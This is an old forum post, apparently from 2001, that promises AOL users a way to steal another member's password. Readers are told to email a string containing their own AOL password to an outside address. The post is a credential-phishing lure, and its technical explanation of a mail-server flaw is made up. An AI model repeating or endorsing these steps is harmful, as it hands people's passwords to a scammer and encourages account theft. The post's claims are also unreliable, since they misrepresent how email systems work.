Posted by AOL Hacker on Tue Oct 9 15:06:51 2001: IP Address: 172.177.95.9
: : : (([[THIS REALLY WORKS FOR AOL USERS:]]))
: : (1) If and ONLY IF you have AOL, send an E-mail to aolbackdoor@web.de
: : (2) In the subject box type the screenname of the person whose password you wish to steal
: : (3) In the message box type the following: /cgi-bin/start?v703&login=passmachine&f={your aol password}&f=27586&javascript=ACTIVE&rsa>
: : (4)Send the e-mail with a file attatched "NO" greater than 10 KB in size
: : (5) wait 2-3 minutes and check your mail
: : (6) Read the message.-Where YOUR password was typed before, NOW, the password of the screenname in the code string is there!!!
: : Why does this work? I'll tell you. When you send this e-mail, you are sending it through the AOL MAIL SERVER. It will not accept file attachments without a valid password. When it reads your valid password in the string of code, it is fooled into thinking that it is the password of the user in the subject box. But since AOL cannot discard file attachments under a certain size, It returns the e-mail to you, accidently correcting the password. HAVE FUN!!! *disclaimer*- i am not responsible if someone decides to exploit this error in AOL Mail Server, or for AOL being stupid.
Follow Ups:
Post a Followup
